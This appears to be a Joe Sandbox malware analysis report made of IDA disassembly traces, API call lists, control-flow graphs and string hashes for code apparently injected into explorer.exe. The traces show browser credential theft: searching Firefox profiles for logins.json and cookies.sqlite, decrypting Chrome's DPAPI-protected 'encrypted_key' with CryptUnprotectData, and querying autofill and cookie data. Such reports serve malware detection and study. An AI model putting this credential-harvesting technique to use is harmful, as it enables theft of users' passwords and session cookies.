                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 02D62B3D
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02DB62CC), ref: 02D62B63
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02DB62D0), ref: 02D62B7B
                                                                                                                                                                                                                                • Part of subcall function 02D619B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D619C4
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,logins.json), ref: 02D62BE7
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02D62C16
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02D62C43
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02D62C52
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                                                                                                              • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                                                                                                              • API String ID: 1108783765-3717368146
                                                                                                                                                                                                                              • Opcode ID: 6469887e40104912b487a07fa614a79c0a2696fcd4308f170e55f327ac27dc44
                                                                                                                                                                                                                              • Instruction ID: 8993d534761e34b8241694e21460af8defcda05b038a8953d01f69f283529fec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6469887e40104912b487a07fa614a79c0a2696fcd4308f170e55f327ac27dc44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531AF307043058B9B16AB7098ACA7F73DBEF84700F04492DED5A92384EB79CD059AA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 531 2d61d4a-2d61d5c 532 2d61eb4-2d61ebe 531->532 533 2d61d62-2d61d66 531->533 533->532 534 2d61d6c-2d61d77 call 2d619b4 533->534 537 2d61d8b-2d61d97 call 2d61953 534->537 538 2d61d79-2d61d89 call 2d61953 534->538 543 2d61d9b-2d61d9d 537->543 538->543 543->532 544 2d61da3-2d61db4 FindFirstFileW 543->544 545 2d61ead-2d61eaf call 2d61011 544->545 546 2d61dba 544->546 545->532 547 2d61dbe-2d61dc3 546->547 549 2d61dc5-2d61dd7 lstrcmpiW 547->549 550 2d61e3d-2d61e6a call 2d61953 call 2d6199d lstrcmpiW 547->550 552 2d61e8e-2d61e9c FindNextFileW 549->552 553 2d61ddd-2d61def lstrcmpiW 549->553 561 2d61e87-2d61e89 call 2d61011 550->561 562 2d61e6c-2d61e75 call 2d61cf7 550->562 552->547 556 2d61ea2-2d61ea9 FindClose 552->556 553->552 555 2d61df5-2d61e00 call 2d619b4 553->555 563 2d61e02-2d61e07 555->563 564 2d61e09 555->564 556->545 561->552 562->561 570 2d61e77-2d61e7f 562->570 566 2d61e0b-2d61e3b call 2d61953 call 2d6199d call 2d61d4a 563->566 564->566 566->561 570->561
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D619B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D619C4
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02D61DA9
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02DB62CC), ref: 02D61DCF
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02DB62D0), ref: 02D61DE7
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 02D61E62
                                                                                                                                                                                                                                • Part of subcall function 02D61CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62C27), ref: 02D61D02
                                                                                                                                                                                                                                • Part of subcall function 02D61CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02D61D0D
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02D61E94
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02D61EA3
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                                                                                                              • String ID: *.*$\*.*
                                                                                                                                                                                                                              • API String ID: 232625764-1692270452
                                                                                                                                                                                                                              • Opcode ID: 7fc92168462c9b9e1501e8c4bbb8deefc9f58925015fd7563b07f6cf25a0a149
                                                                                                                                                                                                                              • Instruction ID: 9c2e5d3a2198d9ef3f095d4951b0bba1597ffc3415e87faeec0862eba802d693
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fc92168462c9b9e1501e8c4bbb8deefc9f58925015fd7563b07f6cf25a0a149
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93161317043419BDB11EB75889CBBF77EA9FC4240F144929E95E82345EB75CC19CAA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 641 2d63e04-2d63e11 call 2d61b6a 644 2d63e17-2d63e22 call 2d61c31 641->644 645 2d63ed4-2d63ed8 641->645 644->645 648 2d63e28-2d63e34 call 2d62fb1 644->648 651 2d63e3a-2d63e4f call 2d6123b 648->651 652 2d63ec8-2d63ecc 648->652 655 2d63ec0-2d63ec7 call 2d61011 651->655 656 2d63e51-2d63e58 651->656 652->645 655->652 657 2d63ebf 656->657 658 2d63e5a-2d63e6a 656->658 657->655 660 2d63e6c-2d63e7c RtlCompareMemory 658->660 661 2d63eb8-2d63eba call 2d61011 658->661 660->661 663 2d63e7e-2d63ea6 CryptUnprotectData 660->663 661->657 663->661 665 2d63ea8-2d63ead 663->665 665->661 666 2d63eaf-2d63eb3 665->666 666->661
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F
                                                                                                                                                                                                                                • Part of subcall function 02D61C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02D63E1E,00000000,?,02D63FA8), ref: 02D61C46
                                                                                                                                                                                                                                • Part of subcall function 02D61C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02D63FA8), ref: 02D61C56
                                                                                                                                                                                                                                • Part of subcall function 02D61C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02D63FA8), ref: 02D61C76
                                                                                                                                                                                                                                • Part of subcall function 02D61C31: CloseHandle.KERNEL32(00000000,?,02D63FA8), ref: 02D61C91
                                                                                                                                                                                                                                • Part of subcall function 02D62FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02D63E30,00000000,00000000,?,02D63FA8), ref: 02D62FC1
                                                                                                                                                                                                                                • Part of subcall function 02D62FB1: lstrlen.KERNEL32("encrypted_key":",?,02D63FA8), ref: 02D62FCE
                                                                                                                                                                                                                                • Part of subcall function 02D62FB1: StrStrIA.SHLWAPI("encrypted_key":",02DB692C,?,02D63FA8), ref: 02D62FDD
                                                                                                                                                                                                                                • Part of subcall function 02D6123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02D63E4B,00000000), ref: 02D6124A
                                                                                                                                                                                                                                • Part of subcall function 02D6123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61268
                                                                                                                                                                                                                                • Part of subcall function 02D6123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61295
                                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02D63E74
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D63E9E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                                                                                                              • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                                                                                                              • API String ID: 3076719866-957854035
                                                                                                                                                                                                                              • Opcode ID: 8a946909a5da43e803dbd0b37eda39d1d798fce1f2aead54768fbe73b4937b60
                                                                                                                                                                                                                              • Instruction ID: 757af4fa4191cc7b9d1e80bb1df2194897689acf4b02c43c8fb619480fe2d280
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a946909a5da43e803dbd0b37eda39d1d798fce1f2aead54768fbe73b4937b60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F821AA726043465BD711EAA88984A7FB3DDAB94B04F44066DE845D7341DB74CD058BB2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002DC7000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC7000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2dc7000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 23d0a01393b7bfe63dc369c5b6e3a0f8feb8c095d53cae4f5d79b5de4e8245c8
                                                                                                                                                                                                                              • Instruction ID: b2c9c0e94e1c36a62ee18b96b05d8546a30162e0967eacbcae31e73f318db15d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23d0a01393b7bfe63dc369c5b6e3a0f8feb8c095d53cae4f5d79b5de4e8245c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FA108B29186935BD7218E78DCE07F1BBA5EB42324B38076DC5D18B3C6E7609C06C755
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6116F
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02D64BB6
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF), ref: 02D64BBF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1675517319-0
                                                                                                                                                                                                                              • Opcode ID: 9bc3af193b50b2447926297e06b05879f8b1c8a810271e63faf81e928c8169c2
                                                                                                                                                                                                                              • Instruction ID: 98722883e9c49505bc739d2e04987784b5e6a730fc5ac58bdfd582d027df2c0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bc3af193b50b2447926297e06b05879f8b1c8a810271e63faf81e928c8169c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE01236945212A7C6647F74F85CB6A3B5DDB96361F20C915A15992380CB35CC50CAA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6116F
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2580854192-0
                                                                                                                                                                                                                              • Opcode ID: 398e34ae84cdaeeeb3ca7cafc67f8dd6511f75f3e2301ab6cb956e9c1a9a1c2c
                                                                                                                                                                                                                              • Instruction ID: c6b359b242c470910167be7b74295026791db22d9c8623be6a50156aacd17481
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 398e34ae84cdaeeeb3ca7cafc67f8dd6511f75f3e2301ab6cb956e9c1a9a1c2c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FC04C72C85260D7CA6167B4792CBDA3B1DDF496A6F050841B509A7345CA65CC518AE0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemInfo.KERNELBASE(02DC20A4,00000001,00000000,0000000A,02DB3127,02D628DA,00000000,?), ref: 02D6BFFC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                              • Opcode ID: 08a31eafcb4fb02340cdab638fa6749e5e4d4cb665898421e61b62149290e112
                                                                                                                                                                                                                              • Instruction ID: 95eac8a094f8e63a73aa52678855d92ea688dad5eec01b787a64209c45951bfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08a31eafcb4fb02340cdab638fa6749e5e4d4cb665898421e61b62149290e112
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5E0ED3178831176F61036B86C1FF2A164E8B80B10F704A19B719EA3CADBD9CD5158B6

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 02D63C6A
                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02D63C76
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02D63C7D
                                                                                                                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02D63C89
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02D63D2F
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D63D36
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D63D55
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D63D61
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02D63D89
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02D63DB2
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D63DED
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                                                                                                              • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                                                                                                              • API String ID: 2923052733-3488123210
                                                                                                                                                                                                                              • Opcode ID: b6ed524bc4e43c9c5f596e8748610c3597e990347fe0d5b485fe84709aad9a8b
                                                                                                                                                                                                                              • Instruction ID: d3f9bbdee155e313a7de55d6030dcb7023bcd21c136430d5a4ea66c387a2678e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ed524bc4e43c9c5f596e8748610c3597e990347fe0d5b485fe84709aad9a8b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29417D31608241EBD711AB758C98E3F7BAEEF85B45F10486CF946A6341DB35DC058FA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 348 2d628f8-2d628fa 349 2d62900-2d6291c call 2d61000 call 2d802ec 348->349 350 2d62ac8-2d62ada call 2db3848 DeleteFileW call 2d61011 348->350 359 2d62922-2d6293a call 2d61fa7 349->359 360 2d62a8f-2d62aa2 call 2d7fb92 lstrlen 349->360 357 2d62adf-2d62ae6 350->357 367 2d6293c-2d62942 359->367 368 2d62948-2d6295f call 2d61fa7 359->368 365 2d62aa4-2d62abc call 2d61798 * 3 360->365 366 2d62ac1-2d62ac3 call 2d61011 360->366 365->366 366->350 367->368 371 2d62944 367->371 375 2d62961-2d62967 368->375 376 2d6296d-2d62984 call 2d61fa7 368->376 371->368 375->376 378 2d62969 375->378 383 2d62986-2d6298c 376->383 384 2d62992-2d629a7 call 2d61fa7 376->384 378->376 383->384 385 2d6298e 383->385 388 2d629b5-2d629cc call 2d61fa7 384->388 389 2d629a9-2d629af 384->389 385->384 393 2d629ce-2d629d4 388->393 394 2d629da-2d629e5 lstrlen 388->394 389->388 390 2d629b1 389->390 390->388 393->394 395 2d629d6 393->395 396 2d629eb-2d629f0 lstrlen 394->396 397 2d62a79-2d62a85 call 2d802ec 394->397 395->394 396->397 399 2d629f6-2d62a11 call 2d61000 396->399 397->359 402 2d62a8b 397->402 404 2d62a13 399->404 405 2d62a1b-2d62a56 call 2d62112 wsprintfA lstrlen 399->405 402->360 404->405 408 2d62a6a-2d62a74 lstrcat call 2d61011 405->408 409 2d62a58-2d62a68 call 2d6102f 405->409 408->397 409->408
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D62AD2
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 02D629E1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D629EC
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D62A38
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D62A44
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02D62A6C
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 02D62A99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                                                                                                              • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                                                                                                              • API String ID: 304071051-2605711689
                                                                                                                                                                                                                              • Opcode ID: b99e4c590446b64e01969e3cb0a8aa1ef2f8457d229fefae4c526b234e4021c0
                                                                                                                                                                                                                              • Instruction ID: af886945491d3b477511144010f461186a12bd6a083fbfd89c4900f1628fce3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b99e4c590446b64e01969e3cb0a8aa1ef2f8457d229fefae4c526b234e4021c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1518D316483468BDB25EF209858B3F77EAEFC5745F04482DE8859B341DB25DC09CBA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 484 2d62cb5-2d62cc7 call 2d61953 488 2d62e17-2d62e2d call 2d62ae9 484->488 489 2d62ccd-2d62d06 call 2d61953 call 2d61000 * 2 call 2d61b6a 484->489 500 2d62d0c-2d62d1c GetPrivateProfileSectionNamesW 489->500 501 2d62df9-2d62e12 call 2d61011 * 4 489->501 500->501 503 2d62d22-2d62d26 500->503 501->488 505 2d62df5 503->505 506 2d62d2c-2d62d32 503->506 505->501 508 2d62d36-2d62d39 506->508 509 2d62d3f-2d62d4d StrStrIW 508->509 510 2d62ded-2d62df1 508->510 512 2d62dd7-2d62de7 lstrlenW 509->512 513 2d62d53-2d62d70 GetPrivateProfileStringW 509->513 510->505 512->508 512->510 513->512 515 2d62d72-2d62d88 GetPrivateProfileIntW 513->515 517 2d62dcc-2d62dd2 call 2d62ae9 515->517 518 2d62d8a-2d62d9c call 2d61953 515->518 517->512 523 2d62db4-2d62dca call 2d62ae9 call 2d61011 518->523 524 2d62d9e-2d62da2 518->524 523->512 525 2d62da4-2d62daa 524->525 526 2d62dac-2d62db2 524->526 525->526 526->523 526->524
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F
                                                                                                                                                                                                                              • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02D62D13
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,Profile), ref: 02D62D45
                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,Path,02DB637C,?,00000FFF,?), ref: 02D62D68
                                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02D62D7B
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 02D62DD8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                                                                                                              • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                                                                                                              • API String ID: 2234428054-4107377610
                                                                                                                                                                                                                              • Opcode ID: 1bc1e460bf237b681f73ecc37b399c5fb3acd01cdd1a174f16a45f7a66a7cee2
                                                                                                                                                                                                                              • Instruction ID: 970b58054bfdf62f4300c0780efd7b56037600033c07be2c6579216a7f3a1b45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bc1e460bf237b681f73ecc37b399c5fb3acd01cdd1a174f16a45f7a66a7cee2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED318D30A443029B9B11AF70986C67F77A6EFC4710F10482AE94AA7381DB75CC46DFE2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 576 2d61333-2d61385 call 2d61000 call 2d6106c call 2d612a3 583 2d61387-2d6139e 576->583 584 2d613a0-2d613a3 576->584 587 2d613b0-2d613b2 583->587 586 2d613aa-2d613ac 584->586 586->587 588 2d615cb-2d615da call 2d61011 587->588 589 2d613b8-2d613ef RtlZeroMemory 587->589 593 2d613f5-2d6141a 589->593 594 2d615c3 589->594 597 2d61420-2d61456 call 2d610b1 593->597 598 2d615bf 593->598 595 2d615ca 594->595 595->588 601 2d6145d-2d61478 597->601 602 2d61458 597->602 598->594 604 2d615b5 601->604 605 2d6147e-2d61483 601->605 602->601 604->598 606 2d61485-2d61496 605->606 607 2d6149d-2d614c7 call 2d61000 wsprintfW 605->607 606->607 610 2d614e0-2d61509 607->610 611 2d614c9-2d614cb 607->611 618 2d615a5-2d615b0 call 2d61011 610->618 619 2d6150f-2d6151b 610->619 612 2d614cc-2d614cf 611->612 614 2d614d1-2d614d6 612->614 615 2d614da-2d614dc 612->615 614->612 616 2d614d8 614->616 615->610 616->610 618->604 619->618 622 2d61521-2d61537 call 2d61000 619->622 626 2d61539-2d61544 622->626 627 2d61546-2d61553 call 2d6102f 626->627 628 2d61558-2d6156f 626->628 627->628 632 2d61573-2d6157d 628->632 633 2d61571 628->633 632->626 634 2d6157f-2d61583 632->634 633->632 635 2d61585 call 2d6104c 634->635 636 2d6159a-2d615a1 call 2d61011 634->636 639 2d6158a-2d61594 RtlMoveMemory 635->639 636->618 639->636
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
